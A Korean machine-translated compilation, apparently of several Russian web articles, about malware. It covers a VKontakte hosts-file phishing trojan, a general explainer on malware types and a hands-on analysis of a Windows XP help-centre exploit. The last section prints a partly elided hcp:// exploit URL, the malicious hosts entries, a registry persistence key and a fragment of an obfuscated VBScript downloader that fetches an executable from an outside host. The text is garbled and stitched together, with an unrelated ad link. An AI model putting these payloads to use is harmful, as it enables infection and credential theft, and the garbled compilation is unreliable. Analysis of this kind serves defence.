바이러스 방지! 트로이 목마, 스파이, 루트킷이란 무엇입니까? 바이러스로부터 컴퓨터를 보호하는 방법은 무엇입니까? 가상 머신 생성 및 작업을 위한 VMware Workstation Player 설치
사용자 컴퓨터의 일부 설정을 변경(호스트 파일 수정)하는 사악한 바이러스가 나타났습니다. 그 결과 겉으로는 모든 것이 평소처럼 보이지만 가려고 했던 곳과 완전히 다른 장소에 있게 되었습니다. 여기에 비밀번호를 입력하고 이름과 비밀번호를 악당들에게 넘겨주는 곳입니다. 그냥 그렇습니다.
자세한 내용과 컷 아래에서 싸우는 방법을 읽어보세요.
VKontakte: 50,000개의 비밀번호를 무료로 사용할 수 있습니다(업데이트됨)
VKontakte 소셜 네트워크 사용자의 계정을 해킹하는 Windows 운영 체제용 컴퓨터 바이러스가 인터넷에 나타났습니다.
트로이 목마는 다음 원칙에 따라 작동합니다. 사용자가 즐겨 사용하는 소셜 네트워크에 로그인을 시도할 때 컴퓨터 브라우저에서 다음과 같은 방식으로 호스트 파일(C:\WINDOWS\system32\drivers\etc\에 위치)을 수정합니다. 중복 사이트; 결과적으로 이메일 주소와 비밀번호는 가짜 리소스에 입력된 직후 도난당한 계정 데이터베이스에 추가됩니다.
4.2MB 파일에는 수만 개의 유효한 주소와 비밀번호가 포함되어 있습니다. 당초 해킹된 계정이 약 13만~15만개 정도 신고됐으나, 반복되는 조합을 삭제해본 결과 그 수가 2~2배 반 정도 적은 것으로 확인됐다. (그런데 그것도 인상적입니다.) Odnoklassniki 네트워크 사용자가 가까운 장래에 공격을 받을 수 있다는 것도 알려져 있습니다. 해커는 이미 해당 데이터에 해당하는 파일을 생성했지만 현재는 비어 있습니다.
우리는 바이러스 백신 회사의 전문가에게 상황에 대해 논평하고 유사한 공격에 대해 이야기하도록 요청했습니다.
Kaspersky Lab의 바이러스 백신 전문가 Denis Maslennikov: 오늘 러시아의 인기 소셜 네트워크 VKontakte 사용자 13만 명 이상의 계정 데이터가 무료로 제공되었습니다. 해당 정보는 해커 사이트 중 하나에 게시되었습니다. 우리 전문가들은 이 데이터를 분석하여 손상 사실을 확인했습니다. 당사 정보에 따르면 사건 내용은 다음과 같습니다. 메시지에 명시된 사이트인 83.133.120.252는 카스퍼스키랩에 피싱 사이트로 알려져 있으며, 개인 제품으로 접속 시도 시 차단된 상태입니다.
악성 프로그램 Trojan.Win32.VkHost.an(7월 28일부터 탐지됨)은 VKontakte 애플리케이션(hxxp://vkontakte.ru/app711384?&m=2, 현재 리소스 관리에 의해 차단됨)을 통해 배포되었습니다. 시스템에 설치한 후 이 트로이 목마는 호스트 파일을 다음으로 대체했습니다.
83.133.120.252 vkontakte.ru
83.133.120.252 odnoklassniki.ru
그런 다음 사용자가 이러한 소셜 네트워크 중 하나의 사이트를 열려고 하면 피싱 페이지로 리디렉션되어 로그인해야 했습니다. 로그인과 비밀번호는 동일한 웹사이트 83.133.120.252의 데이터베이스로 이동했습니다. 현재 Odnoklassniki 데이터베이스는 비어 있으므로 사용자 데이터와 이 소셜 네트워크의 손상에 대해 이야기하기에는 너무 이릅니다.
사용자가 가짜 페이지에 로그인한 후 먼저 새 페이지로 리디렉션이 발생했습니다. 이 페이지에는 다음 텍스트가 포함되어 있습니다.
« 주목! 귀하의 계정은 시스템에 의해 잠재적으로 위험한 계정으로 식별되었습니다. 스팸은 귀하의 IP 주소에서 전송됩니다. 해당 계정은 공격자가 스팸 메일을 보내기 위해 생성한 가짜 계정으로 인식되며, 계정 확인을 거부할 경우 이 알림을 읽은 후 24시간이 지나면 삭제됩니다. 계좌가 진짜라면 인증을 받아야 합니다. orderit30193(공백 없이)이라는 문자로 SMS를 보내면 SMS 응답으로 활성화 코드(번호 6008)를 받게 됩니다. SMS 비용은 요금제 비용에 해당합니다.»
가장 흥미로운 점은 사용자가 SMS를 보내면 실제로 특정 코드를 받는다는 것입니다. 사이트에는 다음 콘텐츠가 포함된 페이지가 있기 때문입니다.
« 코드가 승인되었습니다! 파일을 다운로드하고 실행하십시오 - 다운로드.»
« 잘못된 코드를 입력하셨습니다. 돌아가서 SMS 메시지의 코드를 입력하세요!»
모든 VKontakte 및 Odnoklassniki 사용자는 %windir%\system32\drivers\etc 디렉터리에 있는 호스트 파일의 내용을 확인하고 vkontakte.ru 및 odnoklassniki.ru에 대한 링크가 발견되면 삭제하는 것이 좋습니다. .
모든 소셜 미디어 계정의 비밀번호를 모두 변경하세요. 이러한 피싱 페이지에 접속하게 되면 어떠한 경우에도 사용자 이름과 비밀번호를 입력하거나 SMS 메시지를 보내지 마십시오.
공격자는 호스트 파일 스푸핑을 사용하여 사용자를 피싱 웹 페이지로 리디렉션하는 경우가 많습니다. 불행하게도 이러한 원시적인 방법은 때때로 범죄자들에게 결실을 맺기도 합니다. 온라인 뱅킹 사용자를 대상으로 한 유사한 공격 계획은 라틴 아메리카에서 가장 인기가 높습니다.
Grigory Vasiliev, ESET 기술 이사: vkontakte.ru 계정에 대한 접근 권한은 파밍 공격을 통해 확보되었습니다. 호스트 파일을 변경하여 피해자를 잘못된 IP 주소로 리디렉션하는 것입니다. 사용자는 공격자가 만든 가짜 페이지에 접속하게 되고 공격자는 자신의 계정에 대한 비밀번호를 가로챕니다. 이 경우 가짜 페이지는 겉보기에 실제 페이지와 다르지 않기 때문에 피해자는 아무것도 모를 수 있습니다.
이러한 공격은 실제 돈이 관련된 경우에 가장 자주 사용됩니다. 따라서 온라인 뱅킹에서 파밍을 사용하는 것이 가장 널리 보급되었습니다. 휴리스틱 분석과 함께 HIPS 기술을 사용하는 최신 바이러스 백신 제품은 호스트 파일을 변경하려고 시도하는 악성 코드가 알려지지 않은 새로운 위협인 경우에도 사용자를 효과적으로 보호할 수 있습니다.
추가: 분명히 VKontakte 직원은 모든 "행운"의 비밀번호를 강제로 변경했습니다. 이 단계는 한 가지 주의 사항만 제외하면 의심할 여지 없이 정확합니다. 문제가 완전히 해결되지는 않습니다. 결국, 우리 중 많은 사람들은 모든 경우에 대해 단 하나의 비밀번호만을 생각해냅니다. 그렇다면 데이터베이스가 있는 파일의 소유자는 실험 범위가 가장 넓습니다...
추가 2: Kaspersky Lab은 소셜 네트워크 VKontakte 및 Odnoklassniki 사용자를 초대하여 등록 데이터가 공격자의 손에 있는지 확인합니다. 이는 회사 정보 포털의 특별 페이지에서 수행할 수 있습니다. VKontakte 직원이 영향을 받은 사용자의 비밀번호를 변경했음에도 불구하고 귀하의 주소가 데이터베이스에 있는지(그런데 현재 이전 주소에서는 액세스할 수 없음) 확인하는 것이 좋습니다.
대답이 긍정적인 경우 호스트 파일을 정리하고 PC에 대한 전체 안티 바이러스 검사를 수행해야 합니다. 그리고 한 가지 더: 소셜 네트워크, 이메일 서비스, ICQ 등 방문한 모든 리소스에 동일한 비밀번호를 사용한 경우 긴급하게 비밀번호를 변경해야 합니다. 귀하의 다른 계정을 탈취하려는 사람들이 생각보다 더 많을 수 있습니다(예: Odnoklassniki에 이전 VKontakte 비밀번호를 입력하려고 시도함).
다시 안녕하세요.
오늘 기사의 주제. 컴퓨터 바이러스의 유형, 작동 원리, 컴퓨터 바이러스에 의한 감염 방법.
컴퓨터 바이러스란 대체 무엇입니까?
컴퓨터 바이러스는 농담을 하거나, 다른 사람의 컴퓨터에 해를 끼치거나, 컴퓨터에 액세스하거나, 암호를 가로채거나, 돈을 갈취할 목적으로 특별히 작성된 프로그램 또는 알고리즘 집합입니다. 바이러스는 프로그램과 파일, 부트 섹터를 악성 코드로 자가 복사하여 감염시킬 수 있습니다.
악성코드의 종류.
악성 프로그램은 크게 두 가지 유형으로 나눌 수 있습니다.
바이러스와 웜.
바이러스 - 인터넷에서 다운로드할 수 있는 악성 파일을 통해 확산되거나 불법 복제 디스크에 저장되거나 유용한 프로그램으로 가장하여 Skype를 통해 전송되는 경우가 많습니다(학생들이 종종 후자에 빠지는 것을 발견했습니다. 게임에 대한 모드를 제공하거나 치트를 제공하는 것으로 알려져 있습니다. 실제로 해를 입힐 수 있는 바이러스로 판명될 수도 있습니다.
바이러스는 프로그램 중 하나에 코드를 삽입하거나 사용자가 일반적으로 가지 않는 장소(운영 체제가 있는 폴더, 숨겨진 시스템 폴더)에 별도의 프로그램으로 위장합니다.
감염된 프로그램을 직접 실행하기 전까지는 바이러스가 스스로 실행될 수 없습니다.
웜은 이미 컴퓨터의 많은 파일(예: 모든 exe 파일, 시스템 파일, 부팅 섹터 등)을 감염시킵니다.
웜은 OS, 브라우저 또는 특정 프로그램의 취약점을 이용하여 시스템 자체에 침투하는 경우가 가장 많습니다.
채팅이나 스카이프, ICQ 등 통신 프로그램을 통해 침투할 수 있고 이메일을 통해 유포될 수도 있다.
또한 웹사이트에 있을 수도 있고 브라우저의 취약점을 이용해 시스템에 침투할 수도 있습니다.
웜은 로컬 네트워크를 통해 확산될 수 있습니다. 네트워크의 컴퓨터 중 하나가 감염되면 다른 컴퓨터로 확산되어 모든 파일을 감염시킬 수 있습니다.
웜은 가장 인기 있는 프로그램에 글을 쓰려고 합니다. 예를 들어, 현재 가장 인기 있는 브라우저는 "Chrome"이므로 사기꾼은 이를 위해 글을 작성하고 사이트에 악성 코드를 생성하려고 합니다. 인기 없는 프로그램에 100명의 사용자를 감염시키는 것보다 인기 있는 프로그램을 사용하는 수천 명의 사용자를 감염시키는 것이 더 흥미롭기 때문입니다. 크롬은 지속적으로 보호 기능을 개선하고 있습니다.
네트워크 웜에 대한 최선의 보호는 프로그램과 운영 체제를 최신 상태로 유지하는 것입니다. 많은 사람들이 업데이트를 무시하고 종종 후회합니다.
몇 년 전에 나는 다음과 같은 웜을 발견했습니다.
그러나 그것은 분명히 인터넷을 통해서 온 것이 아니고 불법 복제된 디스크를 통해서 왔을 가능성이 높습니다. 그의 작업의 본질은 다음과 같습니다. 그는 컴퓨터나 플래시 드라이브에 각 폴더의 복사본을 만들었다고 합니다. 그런데 실제로는 비슷한 폴더가 생성되지 않고 exe 파일이 생성되었습니다. 이러한 exe 파일을 클릭하면 시스템 전체에 더 많이 퍼집니다. 그래서 그것을 제거하자마자 플래시 드라이브를 가지고 친구에게 와서 그의 음악을 다운로드하고 그러한 웜에 감염된 플래시 드라이브를 가지고 돌아와서 다시 제거해야했습니다. 이 바이러스가 시스템에 다른 피해를 입혔는지는 모르겠지만 곧 이 바이러스는 사라졌습니다.
바이러스의 주요 유형.
실제로 컴퓨터 위협에는 많은 유형과 종류가 있습니다. 그리고 모든 것을 고려하는 것은 불가능합니다. 그러므로 최근에 가장 흔하고 가장 불쾌한 것들을 살펴 보겠습니다.
바이러스는 다음과 같습니다.
— 파일 기반 — 감염된 파일에 위치하며 사용자가 이 프로그램을 켰을 때 활성화되지만 스스로 활성화할 수는 없습니다.
- 부팅 가능 - Windows가 로드될 때, 시작될 때, 플래시 드라이브 삽입 등을 할 때 로드될 수 있습니다.
- 매크로 바이러스는 웹사이트에 있을 수 있고, 메일이나 Word 및 Excel 문서로 사용자에게 전송될 수 있으며 컴퓨터 고유의 특정 기능을 수행할 수 있는 다양한 스크립트입니다. 그들은 프로그램의 취약점을 악용합니다.
바이러스의 종류.
-트로이 목마 프로그램
— 스파이
— 강탈범
— 파괴자
— 루트킷
— 봇넷
— 키로거
이는 발생할 수 있는 가장 기본적인 유형의 위협입니다. 그러나 실제로는 더 많은 것이 있습니다.
일부 바이러스는 결합되어 여러 유형의 위협을 동시에 포함할 수도 있습니다.
— 트로이 목마 프로그램. 이름은 트로이 목마에서 따왔습니다. 이는 무해한 프로그램으로 가장하여 컴퓨터에 침투한 다음 컴퓨터에 대한 액세스 권한을 열거나 소유자에게 암호를 보낼 수 있습니다.
최근에는 스틸러(stealer)라고 불리는 트로이목마가 널리 퍼지고 있다. 그들은 브라우저와 게임 이메일 클라이언트에 저장된 비밀번호를 훔칠 수 있습니다. 실행 후 즉시 비밀번호를 복사하여 공격자의 이메일이나 호스팅으로 비밀번호를 보냅니다. 그가 해야 할 일은 귀하의 데이터를 수집한 다음 이를 판매하거나 자신의 목적을 위해 사용하는 것뿐입니다.
— 스파이(스파이웨어)는 사용자 작업을 추적합니다. 사용자가 방문하는 사이트 또는 사용자가 컴퓨터에서 수행하는 작업.
- 강탈자. 여기에는 Winlocker가 포함됩니다. 이 프로그램은 컴퓨터에 대한 액세스를 완전히 또는 완전히 차단하고 잠금 해제를 위해 돈을 요구합니다(예: 계정에 입금하는 등). 이런 상황에 빠지면 어떤 경우에도 돈을 보내서는 안 됩니다. 컴퓨터의 잠금이 해제되지 않으며 돈을 잃게 됩니다. 특정 코드를 입력하거나 특정 작업을 수행하여 많은 winlocker를 잠금 해제하는 방법을 찾을 수 있는 Drweb 회사 웹사이트로 직접 연결되는 경로가 있습니다. 예를 들어, 일부 Winlocker는 하루 안에 사라질 수 있습니다.
— 파괴자는 바이러스 백신 사이트에 대한 액세스와 바이러스 백신 및 기타 여러 프로그램에 대한 액세스를 차단할 수 있습니다.
— 루트킷은 하이브리드 바이러스입니다. 다양한 바이러스가 포함되어 있을 수 있습니다. 그들은 귀하의 PC에 액세스할 수 있고 그 사람은 귀하의 컴퓨터에 대한 전체 액세스 권한을 가지며 OS의 커널 수준으로 병합할 수 있습니다. 그들은 유닉스 시스템의 세계에서 왔습니다. 다양한 바이러스를 위장하고 컴퓨터와 모든 컴퓨터 프로세스에 대한 데이터를 수집할 수 있습니다.
— 봇넷은 다소 불쾌한 것입니다. 봇넷은 감염된 컴퓨터를 이용한 DDoS 웹사이트 및 기타 사이버 공격에 사용될 수 있는 감염된 "좀비" 컴퓨터의 거대한 네트워크입니다. 이 유형은 매우 일반적이며 탐지하기 어렵습니다. 심지어 바이러스 백신 회사도 오랫동안 그 존재를 알지 못할 수 있습니다. 많은 사람들이 감염될 수 있지만 이를 인지하지도 못합니다. 당신도 예외는 아니며, 어쩌면 나도 마찬가지일지도 모른다.
- 키로거 - 키로거. 그들은 키보드에서 입력하는 모든 것(웹사이트, 비밀번호)을 가로채서 소유자에게 보냅니다.
컴퓨터 바이러스에 의한 감염 방법.
주요 감염경로.
— 운영 체제 취약성.
- 브라우저 취약점
— 바이러스 백신의 품질이 좋지 않습니다.
— 사용자의 어리석음
- 이동식 미디어.
OS 취약성 - OS에 대한 보호를 아무리 열심히 시도하더라도 시간이 지남에 따라 보안 허점이 나타납니다. 대부분의 바이러스는 가장 널리 사용되는 운영 체제인 Windows용으로 작성되었습니다. 가장 좋은 보호 방법은 운영 체제를 지속적으로 업데이트하고 최신 버전을 사용해 보는 것입니다.
브라우저 - 이는 브라우저 취약성으로 인해 발생하며, 특히 브라우저가 오래된 경우 더욱 그렇습니다. 잦은 업데이트로 치료할 수도 있습니다. 타사 리소스에서 브라우저 플러그인을 다운로드하는 경우에도 문제가 발생할 수 있습니다.
바이러스 백신은 유료 바이러스 백신보다 기능이 적은 무료 바이러스 백신입니다. 유료는 방어 및 실화에서 100 결과를 제공하지 않습니다. 그러나 적어도 무료 바이러스 백신을 사용하는 것이 좋습니다. 나는 이미 무료 바이러스 백신에 대해 썼습니다.
사용자의 어리석음 - 배너 클릭, 편지 등의 의심스러운 링크 따라가기, 의심스러운 장소에서 소프트웨어 설치.
이동식 미디어 - 감염되어 특별히 준비된 플래시 드라이브 및 기타 이동식 미디어에서 바이러스가 자동으로 설치될 수 있습니다. 얼마 전 세계는 BadUSB 취약점에 대해 들었습니다.
https://avi1.ru/ - 이 사이트의 소셜 네트워크에서 매우 저렴한 프로모션을 구매할 수 있습니다. 또한 귀하의 페이지에 대한 리소스 구매에 대한 매우 유리한 제안을 받게 될 것입니다.
감염된 개체의 유형.
파일 - 프로그램, 시스템 및 일반 파일을 감염시킵니다.
부트 섹터는 상주 바이러스입니다. 이름에서 알 수 있듯이 컴퓨터의 부팅 섹터를 감염시키고 해당 코드를 컴퓨터 시작에 할당하며 운영 체제가 시작될 때 시작됩니다. 때로는 잘 위장되어 있어 시작 시 제거하기 어려운 경우도 있습니다.
매크로 명령 - Word, Excel 및 유사한 문서. 저는 Microsoft Office 도구의 매크로와 취약점을 사용하고 운영 체제에 악성 코드를 유입시킵니다.
컴퓨터 바이러스 감염 징후.
이러한 징후 중 일부가 나타난다고 해서 시스템에 바이러스가 존재한다는 의미는 아닙니다. 그러나 존재하는 경우 바이러스 백신으로 컴퓨터를 확인하거나 전문가에게 문의하는 것이 좋습니다.
일반적인 증상 중 하나는 심각한 컴퓨터 과부하입니다. 아무것도 켜지 않은 것 같아도 컴퓨터가 느리게 실행될 때, 컴퓨터에 많은 스트레스를 줄 수 있는 프로그램이 있습니다. 그러나 바이러스 백신이 있는 경우 바이러스 백신 자체가 컴퓨터를 매우 잘 로드한다는 점에 유의하세요. 그리고 로드할 수 있는 소프트웨어가 없다면 바이러스가 있을 가능성이 높습니다. 일반적으로 시작 시 시작되는 프로그램 수를 먼저 줄이는 것이 좋습니다.
이는 감염의 징후 중 하나일 수도 있습니다.
그러나 모든 바이러스가 시스템에 과도한 부하를 줄 수 있는 것은 아닙니다. 일부 바이러스는 변경 사항을 알아차리기가 거의 어렵습니다.
시스템 오류. 드라이버가 작동을 멈추고 일부 프로그램이 제대로 작동하지 않거나 종종 오류로 인해 충돌이 발생하지만 이전에는 이러한 현상이 발견된 적이 없다고 가정해 보겠습니다. 또는 프로그램이 자주 재부팅되기 시작합니다. 물론 이런 일은 바이러스 백신 때문에 발생하는 일입니다. 예를 들어 바이러스 백신이 시스템 파일을 악성으로 간주하여 실수로 삭제했거나 실제로 감염된 파일을 삭제했지만 프로그램의 시스템 파일과 연결되어 삭제로 인해 그런 오류.
브라우저나 데스크톱에도 광고가 나타나면 배너가 나타나기 시작합니다.
컴퓨터가 작동할 때 비표준 소리가 나타납니다(삐걱거리는 소리, 이유 없이 클릭하는 소리 등).
CD/DVD 드라이브가 저절로 열리거나 디스크가 없는데도 디스크 읽기가 시작됩니다.
오랫동안 컴퓨터를 켜거나 끄는 행위.
비밀번호를 훔치는 행위. 귀하를 대신하여 사서함이나 소셜 네트워크 페이지에서 다양한 스팸이 전송되는 것을 발견하면 바이러스가 귀하의 컴퓨터에 침투하여 소유자에게 비밀번호를 전송했을 가능성이 높습니다. 이를 발견하면 바이러스 백신을 사용하여 확인하는 것이 좋습니다. 실패합니다(공격자가 귀하의 비밀번호를 알아낸 것과 정확히 일치한다는 사실은 아니지만).
하드 드라이브에 자주 액세스합니다. 모든 컴퓨터에는 다양한 프로그램을 사용하거나 파일을 복사, 다운로드 또는 이동할 때 깜박이는 표시기가 있습니다. 예를 들어 컴퓨터를 방금 켰는데 사용 중인 프로그램이 없는데 표시등이 자주 깜박이기 시작하면 프로그램이 사용 중인 것으로 보입니다. 이들은 이미 하드 드라이브 수준의 바이러스입니다.
그래서 우리는 실제로 인터넷에서 접할 수 있는 컴퓨터 바이러스를 살펴보았습니다. 그러나 실제로는 그 수가 몇 배나 더 많으며 인터넷을 사용하지 않고 디스크를 구입하지 않고 컴퓨터를 전혀 켜지 않는 것 외에는 자신을 완전히 보호하는 것이 불가능합니다.
사실, 바이러스 치료는 전문가에게 많은 돈을 지불하는 작업으로, 이 작업에 대해 그다지 어려운 작업은 아닙니다. 좋은 바이러스 백신 프로그램을 선택하고 몇 가지 규칙을 따르면서 악성 프로그램을 직접 제거하여 컴퓨터를 바이러스로부터 보호하거나, 감염된 경우 컴퓨터를 "건강한" 상태로 되돌릴 수 있습니다. 가장 중요한 것 중 최소한 두 가지를 선택하십시오. 첫째, 바이러스 백신 데이터베이스를 정기적으로 업데이트하십시오. 두 번째는 한 달에 한 번씩 컴퓨터에서 바이러스를 완전히 검사하는 것입니다.
따라서 이를 염두에 두고 맬웨어 제거는 바이러스 백신을 사용하여 수행되는 것이 분명하다고 생각합니다. 유료 또는 무료가 될 수 있습니다. 다음 기사에서 무료 방법에 대해 설명했습니다.
이제 악성 프로그램, 즉 바이러스란 무엇인지 이야기해 봅시다.
컴퓨터 바이러스 또는 악성 코드컴퓨터에 해를 끼치고, 사용자 데이터를 손상시키고, 개인 정보를 도용하거나 삭제하고, 컴퓨터 성능을 저하시키는 등의 작업을 주요 목적으로 하는 프로그램입니다.
현재까지 악성 코드컴퓨터에 미치는 영향에 따라 여러 유형으로 분류될 수 있습니다.
- 고전적인 바이러스.
- 트로이 목마 프로그램.
- 스파이.
- 루트킷.
- 애드웨어.
각 유형의 악성코드에 대해 자세히 살펴보겠습니다.
클래식 바이러스는 인터넷 등을 통해 컴퓨터를 감염시킬 수 있는 악성 프로그램입니다. 그리고 그러한 바이러스의 본질은 자기 복제입니다. 이러한 바이러스는 스스로를 복사하고 감염된 컴퓨터에 있는 파일과 폴더를 복사합니다. 이는 데이터를 감염시켜 나중에 복구할 수 없도록 하기 위한 것입니다. 이 바이러스는 시스템 파일부터 사용자의 개인 데이터까지 모든 파일에 코드를 삽입하여 컴퓨터의 모든 데이터를 손상시키려고 합니다. 대부분의 경우 감염된 컴퓨터의 구원은 .
트로이 목마는 심각한 유형의 바이러스입니다. 트로이 목마 프로그램은 공격자가 특정 목적(예: 컴퓨터에서 정보를 훔치거나 비밀번호를 "훔치는" 등)을 위해 작성합니다.
트로이 목마는 두 부분으로 나뉩니다. 서버라고 불리는 첫 번째 부분은 공격자가 저장하고, 두 번째 부분인 클라이언트 부분은 인터넷과 기타 장소의 가능한 모든 영역에 배포됩니다. 악성 프로그램의 클라이언트 부분이 컴퓨터에 침입하면 이 PC가 감염되고 트로이 목마는 위장하여 공격자의 서버에 있는 공격자에게 다양한 정보를 보내기 시작합니다.
또한 트로이 목마는 서버(공격자)의 요청에 따라 컴퓨터에서 다양한 작업을 수행하고, 비밀번호를 도용하고, 악성 코드로 문서와 파일을 감염시킬 수도 있습니다.
스파이는 트로이 목마 프로그램과 다소 유사합니다. 그러나 가장 큰 차이점은 스파이가 시스템과 사용자 파일에 해를 끼치지 않는다는 것입니다. 스파이웨어조용히 컴퓨터에 앉아서 감시하세요. 비밀번호를 훔칠 수도 있고 키보드에 입력하는 모든 내용을 완전히 저장할 수도 있습니다.
스파이웨어는 가장 지능적인 바이러스 유형이며 감염된 컴퓨터에서 파일을 보낼 수도 있습니다. 스파이는 설치된 시스템, 사용하는 바이러스 백신, 인터넷에서 사용하는 브라우저, 컴퓨터에 설치된 프로그램 등 감염된 PC에 대한 많은 정보를 알고 있습니다. 스파이웨어는 가장 위험한 악성 코드 중 하나입니다.
루트킷은 바이러스 자체가 아닙니다. 그러나 루트킷은 컴퓨터에 다른 바이러스가 존재하는 것을 숨기는 것이 목적인 프로그램입니다. 예를 들어 컴퓨터가 루트킷과 동시에 스파이웨어 바이러스에 감염되었습니다. 그리고 루트킷은 바이러스 백신 및 운영 체제에서 스파이를 숨기려고 시도합니다. 따라서 컴퓨터에 루트킷이 존재하는 것은 그다지 위험하지 않습니다. 루트킷은 매우 잘 작동하고 오랫동안 바이러스 백신의 눈에서 많은 바이러스(스파이웨어, 트로이 목마)를 숨길 수 있기 때문입니다!
애드웨어는 또 다른 유형의 악성 소프트웨어입니다. 이것은 덜 위험한 프로그램이며 그 본질은 컴퓨터의 다양한 장소에서 다양한 방식으로 광고를 표시하는 것입니다. 애드웨어는 해를 끼치거나 파일을 감염시키거나 손상시키지 않습니다. 하지만 이런 종류의 바이러스로부터도 자신을 보호해야 합니다.
다음은 존재하는 악성 코드 유형입니다. 컴퓨터를 바이러스로부터 보호하려면 좋은 바이러스 백신이 필요합니다. 나는 다른 기사에서 이에 대해 이야기했고 이제 컴퓨터에 대한 바이러스 및 보호 체계를 설명하는 주제를 계속하겠습니다.
이전에는 바이러스에 특별한 목적이 없었고 재미로 작성되었으며 개발자가 구체적인 목표를 설정하지 않았습니다. 이제 바이러스는 복잡한 알고리즘이며, 그 핵심은 대부분 돈과 데이터를 훔치는 것입니다. 대부분의 경우 트로이 목마는 비밀번호 및 기타 중요한 데이터를 훔치도록 설계되었습니다.
그런데 컴퓨터가 바이러스의 공격을 받았는지 여부는 다음과 같은 특정 징후로 확인할 수 있습니다.
- 프로그램이 제대로 작동하지 않거나 작동이 완전히 중지됩니다.
- 컴퓨터가 느려지고 느리게 작동하기 시작했습니다.
- 일부 파일이 손상되어 열리지 않습니다.
매우 자주 그러한 징후가 될 수 있습니다 컴퓨터 바이러스 감염의 징후, 그러나 다행스럽게도 항상 그런 것은 아닙니다.
대부분의 경우 하나의 특정 바이러스가 다양한 유형의 파일을 감염시킬 수 있습니다. 따라서 컴퓨터가 강력한 바이러스 공격을 치료한 후에도 가장 올바른 조치는 파티션을 포맷하는 것입니다.
위에서 말했듯이 바이러스 백신 프로그램은 바이러스로부터 자신을 보호하는 데 도움이 됩니다. 오늘날 바이러스 백신 프로그램에는 인터넷에 배포되는 거의 모든 악성 프로그램을 퇴치하기에 충분한 기능이 있습니다. 그러나 바이러스로부터 최대한의 보호를 위해서는 적절하게 선택되고 구성된 안티 바이러스 프로그램이 완전한 "전투" 기능을 위해 중요한 역할을 합니다. 나는 당신이 기사를 읽는 것이 좋습니다. 하지만 시간이 없다면 바로 여기에서 최고의 바이러스 백신 프로그램을 알려 드리겠습니다. 오늘은:
- 카스퍼스키
- 어베스트
- 닥터웹
- NOD32
선택할 수 있는 것이 많다고 생각합니다.
바이러스 보호에 행운과 행운이 있기를 바랍니다.
어린 시절부터 나는 "컴퓨터가 어떻게 바이러스에 감염됩니까? "라는 질문으로 괴로워했습니다. 마침내 나는 그것을 발견하고 스스로 느꼈습니다. 이 매우 흥미로운 과정이 실제로 어떻게 작동하는지 세상에 알리는 것은 어떨까요?
감염에 대한 매뉴얼을 작성하지 않기 위해 많은 사람들이 사용하게 될 것이므로, 스크립트의 일부를 삭제하겠습니다.
모두가 이미 MS Windows의 "성공성"에 대한 문구에 지쳤을 것입니다. 그럼에도 불구하고 MS Windows는 지구상에서 가장 널리 퍼진 시스템으로 남아 있습니다. 아니면 시스템이 너무 널리 퍼져 있기 때문에 구멍이 너무 많을 수도 있습니다.
그리고 이제 공격은 Windows XP 시스템의 취약점 중 하나인 Windows 도움말 센터에 대해 수행되었습니다.
늘 그렇듯이 이 문제는 오래 전에 시작되었습니다(2010년). 매우 잘 알려진 리소스 xakep.ru(페이지 맨 아래)에서 해당 내용을 읽을 수 있습니다.
그것은 모두 간단하게 시작되었습니다.
IE는 tjyre.info 리소스에서 프로그램 열기 요청을 발행했습니다. 분명히 바이러스입니다! 하지만 흥미롭다!!
사이트로 이동 http://tjyre.info사이트가 개발 중이라는 점을 제외하고는 어떠한 정보도 제공하지 않습니다(게시물을 게시할 당시에는 전혀 작동하지 않으며 분명히 망쳤습니다).
내 컴퓨터에 대한 의도를 어떻게 알 수 있습니까? 이는 기본입니다. 링크가 어디로 연결되는지 고려해야 합니다.
hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A% %A ... %%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=eval(Run(String.fromCharCode(99,109,100,32,47,99,32,101,… 삭제됨)V목적" 보안"...116,114,46,101,120,101)));
내 문맹으로 인해 바이러스 파일에 대한 링크가 숫자 뒤에 숨겨져 있습니다.
간단한 변환을 통해 숫자는 파일 이름이 l .vbs인 스크립트를 내 컴퓨터의 시스템 폴더에 복사하고 후속 실행을 숨기는 것으로 나타났습니다.
네트워크에 스크립트가 게시된 주소:
http://tjyre.info/games/hcp_vbs.php?f=17
열리는 파일에는 다음 텍스트가 포함되어 있습니다.
« w=3000:x=200:y=1:z=false:a = "http://tjyre.info/u.php?e=7&f=17":Set e = Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS") )):Set f=e.GetSpecialFolder(2):b = f & "\exe.ex2":b=Replace(b,Month("2010-02-16"),"e"):OT = "GET ":Set c = CreateObject(StrReverse("PTTHLMX.2LMXSM")):Set d = CreateObject(StrReverse("maertS.BDODA")) ... 말도 안되는 이유로 삭제되었습니다..지 =영형.파일 가져오기(b):g.삭제»
텍스트는 매우 간단합니다.
날짜는 2010년 2월 16일입니다. (날짜별로 바이러스를 일부 마스킹하고 있는 것으로 나타났습니다. 결국 그들은 자신을 위장해야 한다는 생각을 채택했습니다.)
바이러스 파일이 컴퓨터로 날아가는 데 도움을 받아 명령이 뒤집어진 것을 볼 수 있습니다(역방향 사용).
새로운 readme.exe를 안전하게 설치합니다. 이 손님은 우리에게 무엇을 가져다 주나요? 확실히 많은 기쁨이 있습니다.
읽어보기를 실행하세요. exe는 antiwinlocker 프로그램에 의해 매우 성공적으로 차단되었습니다. 그 때문에 그녀는 영광과 칭찬을 받습니다. 하지만 아직 무슨 일이 일어나는지 보고 싶기 때문에 수비수들에게 잠시 떠나달라고 요청해야 할 것입니다.
바이러스의 첫 번째 출시는 눈에 띄지 않았으며 이는 바이러스가 침투하여 다음 다운로드까지 숨겨졌음을 이해할 수 있습니다.
재부팅하고 다시 침묵합니다. 신비!!
비밀 코너를 살펴 봐야합니다.
"C:\Documents and Settings\Admin\Application Data" 폴더에서 lsass.exe 파일(시스템 프로세스 시뮬레이션)을 찾으세요.
따라서 레지스트리에서 키를 찾습니다.
"userinit"="C:\\WINDOWS\\system32\\userinit.exe,C:\\Documents and Settings\\Admin\\Application Data\\lsass.exe", 예상대로입니다.
하지만 그게 전부는 아닙니다!
"C:\WINDOWS\system32\drivers\etc" 폴더에는 매직 호스트 파일이 있으며, 여기에 바이러스가 12개의 매직 라인을 추가합니다(전체 호스트 파일을 살펴보시기 바랍니다):
이 라인을 사용하면 Odnoklassniki 및 Vkontakte 사이트에서 매우 특정 사이트로 리디렉션이 이루어지며 Kaspersky 업데이트에 대한 완전한 혼란을 야기합니다(바이러스는 Trojan.Win32.Ddox.ci와 유사합니다).
